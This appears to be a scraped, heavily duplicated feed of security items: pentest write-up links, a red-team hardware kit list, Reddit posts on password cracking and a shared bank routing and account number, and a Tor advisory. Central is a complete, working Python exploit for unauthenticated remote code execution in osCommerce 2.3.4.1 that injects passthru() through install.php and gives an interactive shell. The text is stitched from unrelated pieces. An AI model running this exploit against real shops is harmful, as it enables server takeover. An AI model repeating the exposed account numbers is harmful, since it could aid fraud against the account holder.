Basic Penetration Testing | John Hammond : TryHackMe Write-Up
https://medium.com/@innovativehazard/basic-penetration-testing-john-hammond-tryhackme-write-up-4c121a6fd40?source=rss------bug_bounty-5
https://medium.com/@innovativehazard/basic-penetration-testing-john-hammond-tryhackme-write-up-4c121a6fd40?source=rss------bug_bounty-5
Hi Hacker,Continue reading on Medium » (https://medium.com/@innovativehazard/basic-penetration-testing-john-hammond-tryhackme-write-up-4c121a6fd40?source=rss------bug_bounty-5)
Introduction to API Penetration Testing: Modern Approaches and Techniques
https://systemweakness.com/introduction-to-api-penetration-testing-modern-approaches-and-techniques-b8d8c1f7076c?source=rss------bug_bounty-5
https://systemweakness.com/introduction-to-api-penetration-testing-modern-approaches-and-techniques-b8d8c1f7076c?source=rss------bug_bounty-5
Description: Completed understanding of API PT. Modern approached and techniques.Continue reading on System Weakness » (https://systemweakness.com/introduction-to-api-penetration-testing-modern-approaches-and-techniques-b8d8c1f7076c?source=rss------bug_bounty-5)
Introduction to API Penetration Testing: Modern Approaches and Techniques
Description: Completed understanding of API PT. Modern approached and techniques.Continue reading on System Weakness »
Read more...
Description: Completed understanding of API PT. Modern approached and techniques.Continue reading on System Weakness »
Read more...
Basic Penetration Testing | John Hammond : TryHackMe Write-Up
Hi Hacker,Continue reading on Medium »
Read more...
Hi Hacker,Continue reading on Medium »
Read more...
Redteam-Hardware-Toolkit - Red Team Hardware Toolkit
http://www.kitploit.com/2021/07/redteam-hardware-toolkit-red-team.html
http://www.kitploit.com/2021/07/redteam-hardware-toolkit-red-team.html
Role of a Red Team
This is a designated group that tests the security posture of your organization to see how it will fair against real-time attacks – before it actually happens. Hiring people with different backgrounds and specialties helps to round out your security red team to ensure you are testing and seeing your company form the various perspectives of an attacker. Your Red Team should periodically challenge your security measures throughout the year. Primarily their job will be testing your infrastructure (https://www.kitploit.com/search/label/Infrastructure) to see how it’d hold up against different attack methodologies without giving notice to fellow employees. But also, it’s worthwhile to have your Red Team test your organization after implementing a new security software or program to the mix.
Red Team vs. Penetration Tester
Penetration Testers are a must have for any organization. This is a designated person who will ethically hack and evaluate your environment. In this role they will be the point of contact and operate as the brains behind your security scope. While it’s good to have someone in place to handle this – keeping up with the number of tests needed is growing to be too much for one individual to handle. The number of attacks are growing and the amount of research and experience that’s required to get ahead of these attacks is increasing the gap between time of attack and time of discovery. That’s where red teaming (https://www.kitploit.com/search/label/Red%20Teaming) comes in. Hiring a group of individuals to test and monitor with full visibility (https://www.kitploit.com/search/label/Visibility) into your security posture routinely and consistently better ensures you have the appropriate measures in place to secure your organization.
Hardware Toolkit List :
Lock picks (pocket) - commonly used picks Under-the-door tool Canned air, hand warmers (request-to-exit bypass, etc.) Shove knife/shrum tool -Crash bar tool Dimple lock gun Tubular lock picks Fire/emergency elevator key set USB keylogger and Hak5 rubber ducky Hak5 LAN turtle Pineapple nano LAN tap Wafer and warded pick set Laptop or mobile device External hard drive Fake letter of authorization (https://www.kitploit.com/search/label/Authorization) (as a plan B and to test incident response) Real letter of authorization Props for guises if utilizing social engineering RFID thief/cloner (something that is easy to hide - I often use a clipboard like the one shown in the picture above) Camera (or just use your smartphone) Lock picks (pocket) - common Lock picks (backpack) - expanded set Under-the-door tool Shove knife/shrum tool Crash bar tool Snap gun with interchangeable needles Dimple lock gun Tubular lock picks Hand warmers/canned air Leather gloves/good shoes Fire/emergency elevator key set USB keylogger and Hak5 rubber ducky Hak5 LAN turtle LAN tap Wafers and warded pick set Laptop if needed External hard drive Malicious drops x4 (USB, etc.) Rogue access point (PwnPlug, Pi, whatever your flavor of choice) Hak5 pineapple 15dbi wireless antenna (for outside, not really something you want to stuff in your bag inside). Nexus 7 with nethunter, TP-link adapter etc. Props for guises if utilizing social engineering Fake letter of authorization (as a plan B and to test incident response) Real letter of authorization RFID thief/cloner Camera (or just use your smartphone) Snake camera (a bonus for looking over drop ceilings or floors) Multi-tool A few example resource links for some of the above tools www.sparrowslockpicks.com (http://www.sparrowslockpicks.com/) http://shop.riftrecon.com (http://shop.riftrecon.com/) www.wallofsheep.com (http://www.wallofsheep.com/) www.hackerwarehouse.com (http://www.hackerwarehouse.com/) www.hak5.org (http://www.hak5.org/)
Miscellanies Considerations
This is a designated group that tests the security posture of your organization to see how it will fair against real-time attacks – before it actually happens. Hiring people with different backgrounds and specialties helps to round out your security red team to ensure you are testing and seeing your company form the various perspectives of an attacker. Your Red Team should periodically challenge your security measures throughout the year. Primarily their job will be testing your infrastructure (https://www.kitploit.com/search/label/Infrastructure) to see how it’d hold up against different attack methodologies without giving notice to fellow employees. But also, it’s worthwhile to have your Red Team test your organization after implementing a new security software or program to the mix.
Red Team vs. Penetration Tester
Penetration Testers are a must have for any organization. This is a designated person who will ethically hack and evaluate your environment. In this role they will be the point of contact and operate as the brains behind your security scope. While it’s good to have someone in place to handle this – keeping up with the number of tests needed is growing to be too much for one individual to handle. The number of attacks are growing and the amount of research and experience that’s required to get ahead of these attacks is increasing the gap between time of attack and time of discovery. That’s where red teaming (https://www.kitploit.com/search/label/Red%20Teaming) comes in. Hiring a group of individuals to test and monitor with full visibility (https://www.kitploit.com/search/label/Visibility) into your security posture routinely and consistently better ensures you have the appropriate measures in place to secure your organization.
Hardware Toolkit List :
Lock picks (pocket) - commonly used picks Under-the-door tool Canned air, hand warmers (request-to-exit bypass, etc.) Shove knife/shrum tool -Crash bar tool Dimple lock gun Tubular lock picks Fire/emergency elevator key set USB keylogger and Hak5 rubber ducky Hak5 LAN turtle Pineapple nano LAN tap Wafer and warded pick set Laptop or mobile device External hard drive Fake letter of authorization (https://www.kitploit.com/search/label/Authorization) (as a plan B and to test incident response) Real letter of authorization Props for guises if utilizing social engineering RFID thief/cloner (something that is easy to hide - I often use a clipboard like the one shown in the picture above) Camera (or just use your smartphone) Lock picks (pocket) - common Lock picks (backpack) - expanded set Under-the-door tool Shove knife/shrum tool Crash bar tool Snap gun with interchangeable needles Dimple lock gun Tubular lock picks Hand warmers/canned air Leather gloves/good shoes Fire/emergency elevator key set USB keylogger and Hak5 rubber ducky Hak5 LAN turtle LAN tap Wafers and warded pick set Laptop if needed External hard drive Malicious drops x4 (USB, etc.) Rogue access point (PwnPlug, Pi, whatever your flavor of choice) Hak5 pineapple 15dbi wireless antenna (for outside, not really something you want to stuff in your bag inside). Nexus 7 with nethunter, TP-link adapter etc. Props for guises if utilizing social engineering Fake letter of authorization (as a plan B and to test incident response) Real letter of authorization RFID thief/cloner Camera (or just use your smartphone) Snake camera (a bonus for looking over drop ceilings or floors) Multi-tool A few example resource links for some of the above tools www.sparrowslockpicks.com (http://www.sparrowslockpicks.com/) http://shop.riftrecon.com (http://shop.riftrecon.com/) www.wallofsheep.com (http://www.wallofsheep.com/) www.hackerwarehouse.com (http://www.hackerwarehouse.com/) www.hak5.org (http://www.hak5.org/)
Miscellanies Considerations
Various USB cables (A, B, mini, micro, OTG, etc.) SD Cards, microSD cards Smartphone (earpiece if with a team) Body camera (GoPro/ACE Cameras are sometimes handy with client approval) Extra power packs/batteries Small flashlight (https://www.kitploit.com/search/label/Flashlight) (low lumen) RTFM: Red Team Field Manual
Book :
Rtfm: Red Team Field Manual (https://www.amazon.com/Rtfm-Red-Team-Field-Manual/dp/1494295504) The Hacker Playbook: Practical Guide To Penetration Testing (https://www.amazon.com/Hacker-Playbook-Practical-Penetration-Testing/dp/1494932636/ref=pd_lpo_sbs_14_t_2?_encoding=UTF8&psc=1&refRID=ZHBJAB6T1BWVYYYEEN6F&dpID=51QpIzF3l1L&preST=_SY291_BO1,204,203,200_QL40_&dpSrc=detail) The Hacker Playbook 3: Practical Guide To Penetration Testing (https://www.amazon.com/Hacker-Playbook-Practical-Penetration-Testing/dp/1980901759/ref=pd_lpo_sbs_14_t_0?_encoding=UTF8&psc=1&refRID=ZHBJAB6T1BWVYYYEEN6F&dpID=51BkETcdR%252BL&preST=_SY291_BO1,204,203,200_QL40_&dpSrc=detail) Cybersecurity Attacks (Red Team Activity) [Video] (https://www.packtpub.com/networking-and-servers/cybersecurity-attacks-red-team-activity-video) Cybersecurity – Attack and Defense Strategies (https://www.packtpub.com/networking-and-servers/cybersecurity-attack-and-defense-strategies) Red Team: How to Succeed By Thinking Like the Enemy (https://www.amazon.co.uk/dp/0465048943/ref=rdr_ext_tmb)
Contact :
Linkedin : https://www.linkedin.com/in/ismailtasdelen/ Twitter : https://twitter.com/ismailtsdln GitHub : https://github.com/ismailtasdelen YouTube : https://www.youtube.com/c/IsmailTasdelen
Download Redteam-Hardware-Toolkit (https://github.com/sectool/redteam-hardware-toolkit)
Book :
Rtfm: Red Team Field Manual (https://www.amazon.com/Rtfm-Red-Team-Field-Manual/dp/1494295504) The Hacker Playbook: Practical Guide To Penetration Testing (https://www.amazon.com/Hacker-Playbook-Practical-Penetration-Testing/dp/1494932636/ref=pd_lpo_sbs_14_t_2?_encoding=UTF8&psc=1&refRID=ZHBJAB6T1BWVYYYEEN6F&dpID=51QpIzF3l1L&preST=_SY291_BO1,204,203,200_QL40_&dpSrc=detail) The Hacker Playbook 3: Practical Guide To Penetration Testing (https://www.amazon.com/Hacker-Playbook-Practical-Penetration-Testing/dp/1980901759/ref=pd_lpo_sbs_14_t_0?_encoding=UTF8&psc=1&refRID=ZHBJAB6T1BWVYYYEEN6F&dpID=51BkETcdR%252BL&preST=_SY291_BO1,204,203,200_QL40_&dpSrc=detail) Cybersecurity Attacks (Red Team Activity) [Video] (https://www.packtpub.com/networking-and-servers/cybersecurity-attacks-red-team-activity-video) Cybersecurity – Attack and Defense Strategies (https://www.packtpub.com/networking-and-servers/cybersecurity-attack-and-defense-strategies) Red Team: How to Succeed By Thinking Like the Enemy (https://www.amazon.co.uk/dp/0465048943/ref=rdr_ext_tmb)
Contact :
Linkedin : https://www.linkedin.com/in/ismailtasdelen/ Twitter : https://twitter.com/ismailtsdln GitHub : https://github.com/ismailtasdelen YouTube : https://www.youtube.com/c/IsmailTasdelen
Download Redteam-Hardware-Toolkit (https://github.com/sectool/redteam-hardware-toolkit)
hacking: security in practice
How do people crack passwords on big websites/apps/social medias?
I have recently been hacked on my Instagram account and I've been thinking about how do people hack those. I've learnt some things about computers.
All I know is that instagram transforms their passwords into hash format so when someone logs into their account, what password is input is converted into hash format and compared.
Now a question appeared in my head. How do people extract those hashes from the Instagram server? Instagram is a big Social Media app and there are lots of developers working on that right? Maintaining security and fixing bugs and all. But how can an average hacker get the hash information and reverse engineer the hash to get the password?
Is there another way of getting a password? Like using brute force? If using a brute force it can take ages even with a password dictionary.
I asked this question only for my personal education. I don't want to hack anyone at all. Also this could help me better understand the world of tech and how can I protect myself in this environment. Thanks in advance for your answers.
submitted by /u/_SKYL1N3_
[link] [comments]
➖ Sent by @TheFeedReaderBot ➖
How do people crack passwords on big websites/apps/social medias?
I have recently been hacked on my Instagram account and I've been thinking about how do people hack those. I've learnt some things about computers.
All I know is that instagram transforms their passwords into hash format so when someone logs into their account, what password is input is converted into hash format and compared.
Now a question appeared in my head. How do people extract those hashes from the Instagram server? Instagram is a big Social Media app and there are lots of developers working on that right? Maintaining security and fixing bugs and all. But how can an average hacker get the hash information and reverse engineer the hash to get the password?
Is there another way of getting a password? Like using brute force? If using a brute force it can take ages even with a password dictionary.
I asked this question only for my personal education. I don't want to hack anyone at all. Also this could help me better understand the world of tech and how can I protect myself in this environment. Thanks in advance for your answers.
submitted by /u/_SKYL1N3_
[link] [comments]
➖ Sent by @TheFeedReaderBot ➖
reddit
How do people crack passwords on big websites/apps/social medias?
I have recently been hacked on my Instagram account and I've been thinking about how do people hack those. I've learnt some things about...
hacking: security in practice
Can anyone do something with this?
I have the following information, but I don't know if it's useful. Could someone advise?
It's just a series of numbers. If anyone finds it useful, by all means, use it.
ABA 052000113
ACCT 9851076993
submitted by /u/ProfessorMJR
[link] [comments]
➖ Sent by @TheFeedReaderBot ➖
Can anyone do something with this?
I have the following information, but I don't know if it's useful. Could someone advise?
It's just a series of numbers. If anyone finds it useful, by all means, use it.
ABA 052000113
ACCT 9851076993
submitted by /u/ProfessorMJR
[link] [comments]
➖ Sent by @TheFeedReaderBot ➖
reddit
Can anyone do something with this?
I have the following information, but I don't know if it's useful. Could someone advise? It's just a series of numbers. If anyone finds it...
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
osCommerce 2.3.4.1 Remote Code Execution
https://3.bp.blogspot.com/-GFxdnkVY0Lw/WWlvniKY45I/AAAAAAAAIRU/77qCibw7l9gJ7HKa7eHBCfMI2N56gMPzwCLcBGAs/s1600/hack_img6.png
osCommerce version 2.3.4.1 remote code execution exploit. This is a variant of the original discovery of code execution in this version by Simon Scannell in March of 2018.
MD5 |
Download
Source:packetstormsecurity.com
osCommerce 2.3.4.1 Remote Code Execution
https://3.bp.blogspot.com/-GFxdnkVY0Lw/WWlvniKY45I/AAAAAAAAIRU/77qCibw7l9gJ7HKa7eHBCfMI2N56gMPzwCLcBGAs/s1600/hack_img6.png
osCommerce version 2.3.4.1 remote code execution exploit. This is a variant of the original discovery of code execution in this version by Simon Scannell in March of 2018.
MD5 |
55029b857cf842e7f09f60b952a728deDownload
# Exploit Title: osCommerce 2.3.4.1 - Remote Code Execution (2)
# Vulnerability: Remote Command Execution when /install directory wasn't removed by the admin
# Exploit: Exploiting the install.php finish process by injecting php payload into the db_database parameter & read the system command output from configure.php
# Notes: The RCE doesn't need to be authenticated
# Date: 26/06/2021
# Exploit Author: Bryan Leong <nobodyatall
# Vendor Homepage: https://www.oscommerce.com/
# Version: osCommerce 2.3.4
# Tested on: Windows
import requests
import sys
if(len(sys.argv) != 2):
print("please specify the osCommerce url")
print("format: python3 osCommerce2_3_4RCE.py <url")
print("eg: python3 osCommerce2_3_4RCE.py http://localhost/oscommerce-2.3.4/catalog")
sys.exit(0)
baseUrl = sys.argv[1]
testVulnUrl = baseUrl + '/install/install.php'
def rce(command):
#targeting the finish step which is step 4
targetUrl = baseUrl + '/install/install.php?step=4'
payload = "');"
payload += "passthru('" + command + "');" # injecting system command here
payload += "/*"
#injecting parameter
data = {
'DIR_FS_DOCUMENT_ROOT': './',
'DB_DATABASE' : payload
}
response = requests.post(targetUrl, data=data)
if(response.status_code == 200):
#print('[*] Successfully injected payload to config file')
readCMDUrl = baseUrl + '/install/includes/configure.php'
cmd = requests.get(readCMDUrl)
commandRsl = cmd.text.split('\n')
if(cmd.status_code == 200):
#print('[*] System Command Execution Completed')
#removing the error message above
for i in range(2, len(commandRsl)):
print(commandRsl[i])
else:
return '[!] Configure.php not found'
else:
return '[!] Fail to inject payload'
#testing vulnerability accessing the directory
test = requests.get(testVulnUrl)
#checking the install directory still exist or able to access or not
if(test.status_code == 200):
print('[*] Install directory still available, the host likely vulnerable to the exploit.')
#testing system command injection
print('[*] Testing injecting system command to test vulnerability')
cmd = 'whoami'
print('User: ', end='')
err = rce(cmd)
if(err != None):
print(err)
sys.exit(0)
while(True):
cmd = input('RCE_SHELL$ ')
err = rce(cmd)
if(err != None):
print(err)
sys.exit(0)
else:
print('[!] Install directory not found, the host is not vulnerable')
sys.exit(0)
Source:packetstormsecurity.com
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Tor Half-Closed Connection Stream Confusion
https://1.bp.blogspot.com/-jW_VWiRlkJ4/WWlvh6QcNII/AAAAAAAAIQg/x12g-flM0hAb9z-fRCiW9Z3UAYaaFuf7ACLcBGAs/s1600/h9.png
Tor suffers from an issue where half-closed connection tracking ignores layer_hint and due to this, entry/middle relays can spoof RELAY_END cells on half-closed streams, which can lead to stream confusion between OP and exit.
MD5 |
Download
Source:packetstormsecurity.com
Tor Half-Closed Connection Stream Confusion
https://1.bp.blogspot.com/-jW_VWiRlkJ4/WWlvh6QcNII/AAAAAAAAIQg/x12g-flM0hAb9z-fRCiW9Z3UAYaaFuf7ACLcBGAs/s1600/h9.png
Tor suffers from an issue where half-closed connection tracking ignores layer_hint and due to this, entry/middle relays can spoof RELAY_END cells on half-closed streams, which can lead to stream confusion between OP and exit.
MD5 |
e8e6c45ee71383e0832c1cb3f3a8c903Download
Source:packetstormsecurity.com